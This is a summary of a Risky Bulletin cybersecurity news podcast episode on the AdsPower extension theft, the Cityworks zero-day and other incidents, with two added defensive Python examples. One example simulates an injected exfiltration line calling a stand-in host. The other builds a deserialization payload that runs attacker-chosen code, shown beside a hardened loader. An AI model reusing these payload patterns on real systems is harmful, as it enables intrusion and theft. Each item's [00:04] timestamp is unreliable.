Risky Bulletin: Browser Extension Supply Chain Attack Hits AdsPower
Hosted by risky.biz | Released on February 7, 2025
The latest episode of Risky Bulletin, hosted by Claire Aird and prepared by Catalin Cimpanu, covers a series of significant cybersecurity incidents that have emerged recently. This summary captures the key discussions, insights, and conclusions presented in the episode, providing an overview for those who have not had the chance to listen.
1. Crypto Theft via AdsPower Browser Extensions
Timestamp: [00:04]
The episode opens with a concerning development in the cryptocurrency realm. A threat actor successfully compromised browser extensions associated with the AdsPower platform, a specialized browser used by crypto enthusiasts. The attacker injected malicious code designed to steal wallet recovery phrases and private keys from users.
- Detection and Response: The breach occurred in January and was detected within three days. Upon discovery, AdsPower removed the compromised code and uninstalled the affected extensions from users' browsers.
- Financial Impact: Blockchain security firm SlowMist estimates that approximately $4.7 million in crypto assets was stolen.
- Claire Aird Highlights: "A threat actor has compromised crypto wallet browser extensions for the AdsPower browser platform," ([00:04] Claire Aird).
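One practitioner-side control against this kind of tampering is to pin the contents of an installed extension when it is known good and re-verify before trusting it. The block below is an added example written for this summary; it is not AdsPower's code and is not from the episode. It assumes the extension lives in a single directory, that every regular file under it belongs to the extension, and that SHA-256 of file contents is the identity worth pinning. The sample files and the injected scripts are constructed for the demo.

```python
"""
Baseline-and-verify integrity check for an installed browser extension.

Added example, not AdsPower's or any vendor's code. Assumptions: the extension
lives in one directory, every regular file under it is part of the extension,
and SHA-256 of file contents is the identity we pin. Sample files are constructed.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_tree(root: Path) -> dict[str, str]:
    """Map each regular file under root (posix relative path) to its SHA-256 hex digest."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digests[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def write_baseline(root: Path, baseline_file: Path) -> None:
    """Record the known-good digests; do this right after verifying the install from the vendor."""
    baseline_file.write_text(json.dumps(hash_tree(root), indent=2, sort_keys=True))


def verify(root: Path, baseline_file: Path) -> dict[str, list[str]]:
    """Report files added, removed or modified relative to the baseline."""
    expected = json.loads(baseline_file.read_text())
    actual = hash_tree(root)
    return {
        "added": sorted(set(actual) - set(expected)),
        "removed": sorted(set(expected) - set(actual)),
        "modified": sorted(p for p in expected.keys() & actual.keys() if expected[p] != actual[p]),
    }


def demo() -> dict[str, dict[str, list[str]]]:
    """Constructed scenario: clean install, baseline, then a tampered update that injects an exfil script."""
    with tempfile.TemporaryDirectory() as tmp:
        ext = Path(tmp) / "wallet-ext"
        (ext / "js").mkdir(parents=True)
        (ext / "manifest.json").write_text('{"manifest_version": 3, "name": "wallet (constructed)"}')
        (ext / "js" / "popup.js").write_text("console.log('popup');\n")
        baseline = Path(tmp) / "baseline.json"
        write_baseline(ext, baseline)
        clean = verify(ext, baseline)

        # Simulated compromise (constructed): an existing script gains an outbound POST and a
        # new content script appears, the shape of change a malicious update would produce.
        (ext / "js" / "popup.js").write_text(
            "console.log('popup');\nfetch('https://example.invalid/', {method: 'POST'});\n"
        )
        (ext / "js" / "inject.js").write_text("document.addEventListener('input', () => {});\n")
        tampered = verify(ext, baseline)
    return {"clean": clean, "tampered": tampered}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Legitimate updates change these hashes too, so the check flags every update, which is the point: re-baseline only after confirming the update came from the vendor's signed package, and keep the baseline file somewhere the browser and the extension cannot write to.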
2. Paragon’s Withdrawal from Italy’s Spyware Platform
Timestamp: [00:04]
The Israeli spyware company Paragon has reportedly cut off Italy's access to its surveillance platform following allegations that the Italian government used the software to monitor journalists and activists critical of Prime Minister Giorgia Meloni.
- Italian Response: Italian authorities have denied the claims, maintaining that reports of government surveillance are unfounded.
- Broader Implications: The Italian cases are part of a broader spyware campaign that also hit targets in 13 other EU nations; Meta reports that seven of the targets are based in Italy.
3. U.S. Government Extends Workforce Buyout Program
Timestamp: [00:04]
In a strategic move, the Trump administration has broadened its workforce buyout initiative to include employees from the Cybersecurity and Infrastructure Security Agency (CISA), the Central Intelligence Agency (CIA), and the National Security Agency (NSA).
- Program Details: The buyout lets federal employees who resign within the week keep their current pay and benefits until the end of September.
- Scope of Offer: CISA employees were initially excluded because their roles were classed as national-security related; the program now extends to over 2 million civilian federal workers.
- Quote from Claire Aird: "The White House has extended the buyout to over 2 million civilian federal workers," ([00:04] Claire Aird).
4. Disbandment of DOJ Task Force on Foreign Influence
Timestamp: [00:04]
New U.S. Attorney General Pam Bondi has dismantled a Justice Department task force established in 2017 to combat foreign influence operations targeting U.S. elections.
- Impact: The task force played a pivotal role in charging and sanctioning numerous Russian entities involved in information operations and bot farms aimed at destabilizing elections both domestically and internationally.
5. Taliban Data Leak from 21 Ministries
Timestamp: [00:04]
A significant leak has emerged involving documents from 21 Taliban ministries and government agencies, totaling over 50 gigabytes of data. The files, hosted on a website named TalibLeaks, disclose the names of political prisoners and details about government employees prohibited from leaving Afghanistan.
- Authenticity Affirmed: The Taliban has officially confirmed the legitimacy of the leaked documents.
6. Deloitte’s Settlement Over Ransomware Attack
Timestamp: [00:04]
Deloitte has agreed to pay $5 million to the state of Rhode Island in response to a ransomware attack that targeted the state's health and social services portal in December.
- Usage of Funds: The settlement will fund a call center for affected individuals, as well as credit monitoring and identity protection services.
7. EU’s Investigation into French IT Firm Atos
Timestamp: [00:04]
European Union investigators have opened an inquiry into the French IT company Atos for allegedly using staff based in Russia to develop the EU's new electronic border system.
- Concerns: The system is set to host the EU's largest biometric and personal-information database. The European Public Prosecutor's Office is scrutinizing potential Federal Security Service (FSB) involvement in Atos's Russian operations.
8. Arrest of Suspect in Multi-Organization Cyberattacks
Timestamp: [00:04]
Spain's national police have arrested a suspect in the city of Calpe for allegedly hacking over 40 organizations, including high-level Spanish government agencies, NATO, U.S. Army networks, various private companies, and several dark web forums.
- Notable Incidents: The suspect is also believed to be behind the hack of the UN's International Civil Aviation Organization (ICAO) earlier this year.
9. Financial Troubles for Chinese Cyber Contractor Sichuan Silence
Timestamp: [00:04]
Sichuan Silence, the Chinese cyber contractor responsible for the widespread compromise of Sophos firewalls in 2020, has filed for bankruptcy as of December. This financial distress came shortly after the U.S. sanctioned the company and one of its employees.
- Legal Proceedings: Chinese court documents reveal that the sanctioned employee initiated a labor dispute against Sichuan Silence in July 2020.
- Claire Aird's Commentary: "China is the one place where cybercrime actually doesn't pay," ([00:04] Claire Aird).
10. Exploitation of Zero-Day Vulnerability in Trimble Cityworks
Timestamp: [00:04]
Hackers are exploiting a zero-day deserialization vulnerability in Trimble Cityworks, a platform utilized for managing critical physical infrastructure like water and sewage systems. This vulnerability permits remote code execution, enabling hackers to commandeer the platform.
- Malicious Deployments: The exploited vulnerability has been used to deploy Cobalt Strike implants and custom Rust malware on Cityworks servers.
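The page does not describe the Cityworks bug beyond "deserialization leading to remote code execution", so the block below is an added illustrative example, not Trimble Cityworks code and not the exploit in use. Cityworks is a .NET application; Python's pickle is used here only because it exhibits the same class of flaw in a form that runs stand-alone: the serialized bytes name the callable the loader will invoke. It shows the vulnerable loader beside a hardened one that allow-lists the types it will resolve. The payload, the `record_execution` side channel and the sample record are constructed for the demo.

```python
"""
Insecure deserialization next to a hardened loader.

Added illustrative example, not Trimble Cityworks code: Cityworks is a .NET
application and the details of its bug are not on this page. Python's pickle
is used here only because it exhibits the same class of flaw in a form that
runs stand-alone. Payload contents and the sample record are constructed.
"""
import io
import pickle

# Demo side channel: a real payload would call os.system/subprocess instead.
EXECUTED: list[str] = []


def record_execution(msg: str) -> str:
    EXECUTED.append(msg)
    return msg


class Payload:
    """Serialized object whose __reduce__ tells the loader which callable to invoke."""

    def __reduce__(self):
        # Any importable callable can be named here; the classic choice is os.system.
        return (record_execution, ("attacker code ran",))


def insecure_load(blob: bytes):
    """Vulnerable pattern: the bytes decide what gets called, so RCE is one REDUCE opcode away."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Only resolve a fixed allow-list of types; everything else is refused before it is called."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def hardened_load(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def demo() -> dict:
    """Feed the same attacker blob to both loaders, then a benign record to the hardened one."""
    attacker_blob = pickle.dumps(Payload())
    EXECUTED.clear()
    insecure_load(attacker_blob)
    insecure_ran = EXECUTED.copy()

    EXECUTED.clear()
    try:
        hardened_load(attacker_blob)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True

    benign = pickle.dumps({"asset_id": 42, "tags": ["pump", "north"]})  # constructed record
    return {
        "insecure_ran": insecure_ran,
        "hardened_blocked": blocked,
        "hardened_ran_nothing": EXECUTED == [],
        "benign_roundtrip": hardened_load(benign),
    }


if __name__ == "__main__":
    print(demo())
```

The allow-list is a mitigation; the durable fix is not to accept object graphs from untrusted input at all and to carry data in a schema-checked format such as JSON. In .NET the equivalent guidance is to keep BinaryFormatter and type-name-driven deserializers away from request data. On the detection side, the Cobalt Strike and Rust implants mentioned above would be spawned by the web application's worker process, so a hunt for that process launching unexpected children is the obvious first check on a Cityworks server.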
11. Vulnerabilities in Nextcloud’s File Sharing Platform
Timestamp: [00:04]
Germany's cybersecurity agency, BSI, has identified multiple vulnerabilities in Nextcloud's file-sharing platform that could allow attackers to bypass multi-factor authentication (MFA).
- Security Audits: BSI has conducted recent security evaluations of several open-source projects, including KeePass, Bitwarden, and Vaultwarden. Responding to the findings, Nextcloud has patched all reported issues.
12. DDoS Attacks Targeting Bohemia Interactive’s Games
Timestamp: [00:04]
Game studio Bohemia Interactive is actively mitigating a series of Distributed Denial of Service (DDoS) attacks targeting its titles Arma Reforger and DayZ. The attacks have been traced to a Russian hacking group known as Star Squad Reborn.
- Motivation Behind Attacks: The group claims responsibility, stating that the attacks are in retaliation for the gaming studio's failure to invest in its servers over the past decade, which has resulted in subpar performance for gamers.
Conclusion
This episode of Risky Bulletin underscores the pervasive and evolving nature of cyber threats across various sectors and geopolitical landscapes. From financial theft in the crypto space to state-sponsored surveillance and infrastructure vulnerabilities, the discussions highlight the critical importance of robust cybersecurity measures and international cooperation in mitigating these risks.
Notable Quote Recap:
- "A threat actor has compromised Crypto Wallet browser extensions for the AdsPower browser platform," – Claire Aird ([00:04])
- "The White House has extended the buyout to over 2 million civilian federal workers," – Claire Aird ([00:04])
- "China is the one place where cybercrime actually doesn't pay," – Claire Aird ([00:04])
Stay Informed: For ongoing updates and in-depth analysis of cybersecurity news, tune into future episodes of Risky Bulletin.
This summary excludes advertisements, introductions, and outros to focus solely on the content-rich discussions presented in the episode.
